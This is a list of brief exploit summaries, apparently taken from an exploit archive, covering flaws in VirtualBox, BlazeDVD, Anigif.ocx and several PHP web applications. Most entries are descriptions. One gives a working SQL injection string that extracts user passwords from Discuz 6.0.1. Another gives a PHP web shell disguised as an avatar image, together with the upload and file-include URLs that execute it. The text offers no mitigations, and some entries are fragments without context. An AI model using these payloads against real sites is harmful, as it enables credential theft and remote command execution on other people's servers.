An input validation vulnerability was discovered within VirtualBox's 'VBoxDrv.sys' driver that could allow an attacker, with local but un-privileged access to a host where VirtualBox is installed, to execute arbitrary codewithin the context of the kernel.
BlazeDVD 5.0 suffers from buffer overflow vulnerability that can be exploited via crafted PLF playlist file locally and remotely. It fails to perform boundary checking of the user input file, allowing the EIP to be overwritten, thus, controlling the next instruction of the software. After successful exploitation, calc.exe will be executed. Failed attempts will result in Denial Of Service (DoS).
Anigif.ocx by www.jcomsoft.com can be found distribuited with some applications. There is a stack-based buffer overflow in the ReadGIF and ReadGIF2 methods. After the first exception that will be handled by IE, when the object is released we reach RtlpCoalesceFreeBlocks owning eax and ecx with windogs xp sp1 or the second check of safe-unlink with sp2 in a standard heap overflow scenario.
Ppim v1.0 is vulnerable to file delete and XSS attacks. The file delete vulnerability is present in the upload.php file, which can be exploited by sending a specially crafted HTTP request to the vulnerable script. The XSS vulnerability is present in the events.php file, which can be exploited by sending a specially crafted HTTP request to the vulnerable script.
This exploit is used to gain access to the password of a user in Discuz 6.0.1. It works by sending a POST request to the index.php page with the action set to search and the searchid set to 22%cf'UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=<user_id>/*&do=submit. This will return the password of the user with the given user ID.
The admin panel of Free Hosting Manager 1.2 & 2.0 is vulnerable to insecure cookie handling. An attacker can set the adminuser and loggedin cookie to 1, which will give them access to the admin panel.
Quate CMS 0.3.4 is vulnerable to Local File Include vulnerability. This vulnerability can be exploited by remote attackers to gain system access.
Simply change the site settings by using the post_vars array to set the values of the site settings.
This exploit allows an attacker to add a side block containing PHP code to the LoveCMS website. The code is executed when the page is loaded.
Avatar evil.jpg source: <? system($_GET['cmd']); ?> Enter to upload: http://www.site.com/forum/profile.php?action=editprofile&id=[Your User ID] See the avatar name at your profile. Upload evil avatar and go to: index.php?custom=yes&TID=../../attachments/avatars/[Avatar Name]&ext=jpg&cmd=ls -al
Services By CQR